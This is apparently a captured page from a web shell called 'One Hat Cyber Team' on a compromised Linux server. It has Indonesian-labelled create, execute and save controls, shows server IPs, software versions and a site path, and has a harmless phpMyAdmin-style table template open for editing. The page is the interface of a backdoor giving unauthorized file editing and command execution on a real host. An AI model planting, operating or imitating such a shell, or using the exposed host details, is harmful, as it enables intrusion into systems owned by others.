One Hat Cyber Team
Your IP :
3.137.203.53
Server IP :
104.21.16.1
Server :
Linux agrigation-prod 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64
Server Software :
nginx/1.24.0
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
forge
/
db.gftag.com
/
templates
/
table
/
insert
/
Edit File:
get_head_and_foot_of_insert_row_table.twig
<div class="table-responsive-lg"> <table class="table table-striped align-middle my-3 insertRowTable w-auto"> <thead> <tr> <th>{% trans 'Column' %}</th> {{ type|raw }} {{ function|raw }} <th>{% trans 'Null' %}</th> <th class="w-50">{% trans 'Value' %}</th> </tr> </thead> <tfoot> <tr> <th colspan="5" class="tblFooters text-end"> <input class="btn btn-primary" type="submit" value="{% trans 'Go' %}"> </th> </tr> </tfoot>
Simpan